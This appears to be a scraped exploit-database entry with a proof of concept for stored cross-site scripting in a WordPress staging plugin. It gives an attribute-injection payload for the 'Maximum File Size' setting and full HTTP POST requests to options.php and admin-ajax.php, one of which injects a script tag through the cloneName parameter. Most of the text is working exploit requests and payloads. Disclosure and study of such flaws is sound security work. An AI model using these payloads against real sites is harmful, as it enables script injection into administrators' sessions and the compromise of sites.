## https://sploitus.com/exploit?id=WPEX-ID:91BBDEB0-F2DF-4500-B856-AF0FF68FBB12
With the web browser inspector, change the input field type of settings such as "Maximum File Size (MB)" from number to text, then put the following payload in it and save: ' style=animation-name:rotation onanimationstart=alert(/XSS/)//
POST /wp-admin/options.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 401
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
option_page=wpstg_settings&action=update&_wpnonce=174962afdc&wpstg_settings%5BqueryLimit%5D=10000&wpstg_settings%5BquerySRLimit%5D=20000&wpstg_settings%5BfileLimit%5D=50&wpstg_settings%5BmaxFileSize%5D=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F&wpstg_settings%5BbatchSize%5D=2&wpstg_settings%5BcpuLoad%5D=low&wpstg_settings%5Boptimizer%5D=1&submit=Save+Changes
The XSS will be triggered when accessing the settings again
The cloneName parameter is also affected when sent directly:
POST /wp-admin/admin-ajax.php?action=wpstg_processing&_=1660050565.855 HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Connection: close
Cookie: [admin+]
action=wpstg_cloning&accessToken=YgABqYyPC6Mru2kCQY4qI0mVfMxGxTopA6aR8GJJcsGvUCibhaqJWl5TDjIZfjVc&nonce=eb3be2f317&cloneID=ID&cloneName="><script>alert(/XSS/)</script>
The XSS will be triggered when viewing the Staging Site dashboard (and there is also a lack of escaping when updating the related Staging site)